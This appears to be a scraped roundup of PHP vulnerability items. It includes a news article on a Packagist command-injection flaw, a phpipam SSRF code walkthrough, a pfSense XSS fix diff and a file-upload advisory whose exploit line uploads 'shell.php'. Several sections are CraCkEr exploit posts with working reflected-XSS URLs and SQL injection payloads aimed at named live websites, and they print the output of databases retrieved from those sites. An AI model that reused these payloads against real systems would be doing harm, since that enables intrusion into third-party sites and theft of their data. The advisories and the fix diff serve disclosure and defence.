Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks.
"This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager

Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks.

"This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager Composer to determine and download software dependencies that are included by developers in their projects.

The disclosure comes as planting malware in open source repositories is turning into an attractive conduit for mounting software supply chain attacks.

Tracked as CVE-2022-24828 (CVSS score: 8.8), the issue has been described as a case of command injection and is linked to another similar Composer bug (CVE-2021-29472) that came to light in April 2021, suggesting an inadequate patch.

"An attacker controlling a Git or Mercurial repository explicitly listed by URL in a project's composer.json can use specially crafted branch names to execute commands on the machine running composer update," Packagist disclosed in an April 2022 advisory.

A successful exploitation of the flaw meant that requests to update a package could have been hijacked to distribute malicious dependencies by executing arbitrary commands on the backend server running the official instance of Packagist.

"Compromising \[the backend services\] would allow attackers to force users to download backdoored software dependencies the next time they do a fresh install or an update of a Composer package," Chauchefoin explained.

That said, there is no evidence the vulnerability has been exploited to date. Fixes have been deployed in Composer versions 1.10.26, 2.2.12, and 2.3.5 after SonarSource reported the flaw on April 7, 2022.

Open source code has increasingly become a lucrative target of choice for threat actors owing to the ease with which they can be weaponized against the software supply chain.

Earlier this April, SonarSource also detailed a 15-year-old security flaw in the PEAR PHP repository that could permit an attacker to obtain unauthorized access and publish rogue packages and execute arbitrary code.

"While supply chains can take different forms, one of them is significantly more impactful: By gaining access to the servers distributing these third-party software components, threat actors can alter them to obtain a foothold in the systems of their users," Chauchefoin said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Report Supply Chain Vulnerability in Packagist PHP Repository

phpipam v1.5.0 was discovered to contain a header injection vulnerability via the component /admin/subnets/ripe-query.php.

<?php
//In file https://github.com/phpipam/phpipam/blob/master/app/admin/subnets/ripe-query.php
//line 21
// the source is $\_POST\[‘subnet’\]
$res = $Subnets\->resolve\_ripe\_arin ($\_POST\['subnet'\]);

//In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
//line 3523
public function resolve\_ripe\_arin ($subnet) {
    // ...
    // Note: We can bypass the check by choosing the value in this format
    // \[the correct value for $subnet\_check\]\[.\]\[injection value\]
    //so reset will take the first value of tje explode and the condition will be true
    // take only first bit of ip address to match /8 delegations
    $subnet\_check = reset(explode(".", $subnet));
    // ripe or arin?
    if (in\_array($subnet\_check, $this\->ripe)){ 
        // the injection in $subnet
        return $this\->query\_ripe ($subnet); 
    }
    //...
}

// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 3545
private function query\_ripe ($subnet) {
    // ripe\_arin\_fetch method will be called
    $ripe\_result = $this\->identify\_address ($subnet)=="IPv4" ? $this\->ripe\_arin\_fetch ("ripe", "inetnum", $subnet) : $this\->ripe\_arin\_fetch ("ripe", "inet6num", $subnet);
    // ...
}
// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 3633
private function ripe\_arin\_fetch ($network, $type, $subnet) {
    // set url
    // $subnet is added to $url without sanitization
    // which can go backward in the directory ../../admin/
    $url = $network\=="ripe" ? https://rest.db.ripe.net/ripe/$type/$subnet : https://whois.arin.net/rest/nets;q=$subnet?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2;

    $result = $this\->curl\_fetch\_url($url, \["Accept: application/json"\]);

    $result\['result'\] = json\_decode($result\['result'\]);

    // result
    return $result;
}

// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 1443
// the execution for the curl
public function curl\_fetch\_url($url, $headers\=false, $timeout\=30) {
    $result = \['result'\=>false, 'result\_code'\=>503, 'error\_msg'\=>''\];

    //...

    try {
        $curl = curl\_init();
        // Note: $url is not sanitized
        curl\_setopt($curl, CURLOPT\_URL, $url);
        //....

        $result\['result'\]      = curl\_exec($curl);
        $result\['result\_code'\] = curl\_getinfo($curl, CURLINFO\_HTTP\_CODE);
        $result\['error\_msg'\]   = curl\_error($curl);

        // close
        curl\_close ($curl);

    } catch (Exception $e) {
        $result\['error\_msg'\] = $e\->getMessage();
    }

    return $result;
}

The developers were informed of the report by sending an email on 19/06/2022.

CVE-2022-41443: Header injection (SSRF) vulnerability in phpipam

pfSense v2.5.2 was discovered to contain a cross-site scripting (XSS) vulnerability in the browser.php component. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into a file name.

@@ -148,7 +148,7 @@ function get\_content($dir) {

?>

<tr\>

<td\></td\>

<td class\="fbFile vexpl text-left" id\="<?=$fqpn;?>"\>

<td class\="fbFile vexpl text-left" id\="<?=htmlspecialchars($fqpn);?>"\>

<?php $filename = htmlspecialchars(addslashes(str\_replace("//","/", "{$path}/{$file}"))); ?>

<div onClick\="$('#fbTarget').val('<?=$filename?>'); loadFile(); $('#fbBrowser').fadeOut();"\>

<img src\="/vendor/filebrowser/images/file\_<?=$type;?>.gif" alt\="" title\=""\>

CVE-2022-42247: Encode path+fn in browser.php. Fixes #13262 · pfsense/pfsense@73ca674

Arbitrary file upload vulnerability in php uploader

Advisory #: 216

**Title:** CreativeDream software arbitrary file upload

**Author:** Larry W. Cashdollar

**Date:** 2022-09-08

**CVE-ID:**\[CVE-2022-40721\]

**CWE:**

**Download Site:** https://github.com/CreativeDream

**Vendor:** CreativeDream

**Vendor Notified:** 2020-02-19

**Vendor Contact:** yuliangagarin@mail.ru

**Advisory:** http://www.vapidlabs.com/advisory.php?v=216

**Description:** PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.

**Vulnerability:**

The software allows executable file uploads to the web root directory.

**Export:** JSON TEXT XML

**Exploit Code:**

1.  curl \-vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
    

**Screen Shots:**

**Notes:**

CVE-2022-40721: Larry Cashdollar Vulnerability

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a onerror=alert(1)>vh217GET parameter 'limitstart' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a onerror=alert(1)>fe7s7GET parameter 'limit' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a onerror=alert(1)>tquly[-] Done

Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL              CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable---Parameter: sortdir (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)    Payload: option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,(SELECT (ELT(9096=9096,1))),0x7171626271))&limitstart=0&limit=25---[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.1.33back-end DBMS: MySQL >= 5.1 (MariaDB fork)[INFO] fetching current databasecurrent database: 'stenen_test'[-] Done

Joomla MarvikShop ShoppingCart 3.4 SQL Injection

Joomla JKassa ShoppingCart extension version 2.0.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : GeneticsPro - jkassa.com                                                   ││  Software : Joomla JKassa ShoppingCart 2.0.0                                           ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /shop/men/sweatshirts.feedGET parameter 'manufacturer' is vulnerable---Parameter: manufacturer (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.4.16back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)current database: 'jkassa_umarket'[-] Done

Joomla JKassa ShoppingCart 2.0.0 SQL Injection

Joomla Easy Shop extension version 1.4.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomTech - joomtech.net                                                    ││  Software : Joomla Easy Shop 1.4.1                                                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path:/supermarket/index.phpGET parameter 'file' is vulnerable to XSShttps://demo.joomtech.net/supermarket/index.php?option=com_easyshop&task=ajax.loadImage&file=YXNzZXRzL2ltYWdlcy91c2VyX2N1c3RvbWVycy81NjMvYmFubmVyMi5qcGdzcW9obDxpbWcgc3JjPWEgb25lcnJvcj1hbGVydCgxKT5peG1kYw%3d%3d&size=medium[-] Done

Joomla Easy Shop 1.4.1 Cross Site Scripting

Joomla JUX Charity Hub extension version 1.0.4 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomlaUX - joomlaux.com                                                    ││  Software : JUX Charity Hub 1.0.4 Extension for Joomla                                 ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /extensions/charityhub/index.php/causes/grid-causes/grid-causes-no-sidebar/causesGET parameter 'title' is vulnerable---Parameter: title (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=-7388' OR 2114=2114#&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 4175 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(4175=4175,1))),0x717a626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- GUzX&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 8556 FROM (SELECT(SLEEP(5)))SnfZ)-- awOv&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: PHP 7.3.19back-end DBMS: MySQL >= 5.0 (MariaDB fork)[INFO] fetching current databasecurrent database: 'joomlaux_charityhub2'[-] Done

Joomla JUX Charity Hub 1.0.4 SQL Injection

The Frontend File Manager Plugin WordPress plugin before 21.3 allows any authenticated users, such as subscriber, to rename a file to an arbitrary extension, like PHP, which could allow them to basically be able to upload arbitrary files on the server and achieve RCE

Tag

#php